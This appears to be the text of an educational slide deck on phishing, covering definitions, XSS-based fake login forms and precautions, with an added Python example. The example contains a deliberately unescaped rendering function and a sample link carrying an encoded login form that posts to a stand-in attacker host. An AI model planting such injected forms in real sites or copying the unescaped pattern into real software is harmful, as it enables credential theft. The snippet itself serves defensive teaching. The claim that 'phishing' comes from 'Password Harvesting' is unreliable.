2. PHISHING BASICS
•The word has its origin in two words, “Password Harvesting”, or fishing for passwords.
•Phishing is the attempt to obtain sensitive information such as
usernames, passwords, and credit card details (and sometimes,
indirectly, money), often for malicious reasons, by masquerading
as a trustworthy entity in an electronic communication.
•Also known as “brand spoofing”
•Phishers are phishing artists.
•Phishing techniques were described in detail in the year 1987, and the technique was first used in the year 1995.
3. Phishing Definition
•Phishing is the attempt to obtain sensitive
information such as usernames, passwords, and
credit card details (and sometimes, indirectly,
money), often for malicious reasons, by
masquerading as a trustworthy entity in an electronic
communication.
•It tries to trick users with official-looking messages, for example about:
•Credit card
•Bank account
•eBay
•PayPal
•Some phishing emails also contain malicious or
unwanted software that can track your activities or
slow your computer.
4. Comparison To Spam
•The purpose of a phishing message is to acquire sensitive information about a user. To do so, the message needs to deceive the intended recipient.
•So it doesn’t contain any useful information and hence falls under the category of spam.
•A spam message tries to sell a product or service, whereas a phishing message needs to look like it is from a legitimate organization.
•Techniques applied to spam messages can’t be applied naively to phishing messages.
5. Existing System
•Detect and block the phishing websites in time.
•Enhance the security of the websites.
•Block phishing emails with various spam filters.
•Install online anti-phishing software on users’ computers.
7. How a Phishing Attack Works
•The hacker embeds a fake login form into an XSS-vulnerable page. It might be an online shop, internet banking, a payment system, etc.
•The hacker sends an email with a link to this transformed page (actually the link contains HTML injection code as a parameter). This email looks very similar to the emails typically sent from this website to registered users (only without the user name in the greeting).
•The user clicks the link and opens the fake web page. If the user enters their username and password to log in, all of their account details will be sent to the hacker’s web server.
•The user may not notice anything strange because the real “home” or “Welcome” pages are what they were expecting to see.
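As an added example (not part of the original slides), the snippet below shows why the injected form renders on an XSS-vulnerable page, how output encoding defuses it, and a defender-side triage of email links for HTML-injection markers; the page, parameter and host names are constructed.

```python
# Added example, not from the original slides: reflected HTML injection and its defences.
import html
import re
from urllib.parse import urlsplit, parse_qs


def render_vulnerable(name: str) -> str:
    """Echoes a query parameter into the page unescaped: this is the flaw the
    slides describe, so a parameter carrying <form ...> becomes a real login form."""
    return f"<h1>Welcome {name}</h1>"


def render_hardened(name: str) -> str:
    """Same page with output encoding: any markup in the parameter is shown as inert text."""
    return f"<h1>Welcome {html.escape(name, quote=True)}</h1>"


# Matches the start of an HTML tag (opening or closing) inside a decoded parameter value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)


def triage_link(url: str) -> list[str]:
    """Defender-side check for a link found in an e-mail.
    Returns the reasons it deserves suspicion; an empty list means nothing was found."""
    reasons = []
    parts = urlsplit(url)
    if parts.scheme != "https":
        reasons.append("not https")
    # parse_qs percent-decodes values, so encoded markup such as %3Cform is revealed.
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if MARKUP_RE.search(value):
                reasons.append(f"HTML markup in parameter {key!r}")
    return reasons


# Constructed samples: a legitimate link and one carrying an injected form in a parameter.
SAMPLE_LINKS = [
    "https://shop.example/welcome?name=Alice",
    "http://shop.example/welcome?name=%3Cform%20action%3D%22https%3A%2F%2Fevil.example%22%3E",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(link, "->", triage_link(link) or ["ok"])
    print(render_vulnerable("<b>x</b>"))
    print(render_hardened("<b>x</b>"))
```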
9. Damages Caused By Phishing
•The damage caused by phishing ranges from loss of access to email to substantial financial loss. This style of identity theft is becoming more popular because of the ease with which unsuspecting people often divulge personal information to phishers, including credit card numbers, social security numbers, and mothers’ maiden names. There are also fears that identity thieves can obtain some such information simply by accessing public records. Once they have the information they need and want, the phishers will use that person’s details to create fake accounts in the victim’s name, using up the person’s credit, or even prevent the victim from accessing their own accounts.
11. What Does a Phishing Email Message Look Like?
•Spelling and bad grammar. Cybercriminals are not known
for their grammar and spelling.
•Beware of links in email. If you see a link in a suspicious
email message, don’t click on it.
•Threats. Have you ever received a threat that your Hotmail account would be closed if you didn’t respond to an email message? The email message shown in the next slide is an example of the same trick.
•Spoofing popular websites or companies. Scam artists use graphics in an email that appear to be connected to legitimate websites but actually take you to phony scam sites or legitimate-looking pop-up windows.
15. Precautions to be Taken to Avoid Phishing
•Prevention: What to do
•Protect your computer with anti-virus software,
spyware filters, e-mail filters, and firewall programs,
and make sure that they are regularly updated.
•Ensure that your Internet browser is up to date and security patches are applied.
•Avoid responding to any unknown email or giving your financial information in reply to it.
•Unless the email is digitally signed, it could also be fake.
•Phishers typically ask for information such as
usernames, passwords, credit card numbers, social
security numbers, etc.
16. Precautions to be Taken to Avoid Phishing
•Phishing messages are typically not personalized, while valid messages from your bank or e-commerce company are generally personalized.
•Always ensure that you’re using a secure website when
submitting credit card or other sensitive information via your
Web Browser.
•To make sure you’re on a secure Web server, check the beginning of the Web address bar: it should be “https://” rather than just “http://”.
•Regularly log into your online accounts. Don’t leave them for a
long period of time.
•Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate.
•If anything is suspicious, contact your bank and all card issuers.
17. Prevention: What not to do
•Don’t assume that you can correctly identify a
website as legitimate by just looking at it.
•Don’t use the links in an email to get to any web
page, if you think that the message might not be
authentic.
•Log onto the website directly by typing in the web
address in your browser.
•Avoid filling out forms in email messages that ask for
personal financial information.
•You should only communicate information such as
credit card numbers or account information via a
secure website or the telephone.
18. Conclusion
•Phishing is identity theft. It is fraud. It masquerades as
legitimate and trustworthy entities in order to obtain sensitive
data. It then uses it to “rip off” the misled user with often tragic
consequences.
•Phishing is a form of criminal conduct that poses increasing threats to consumers, financial institutions and commercial enterprises in Canada, the United States, and other countries. Because phishing shows no sign of abating, and indeed is likely to continue in newer and more sophisticated forms, law enforcement in these and other countries will need to cooperate more closely than ever in their efforts to combat phishing, through improved public education, prevention, authentication, and binational and national enforcement efforts.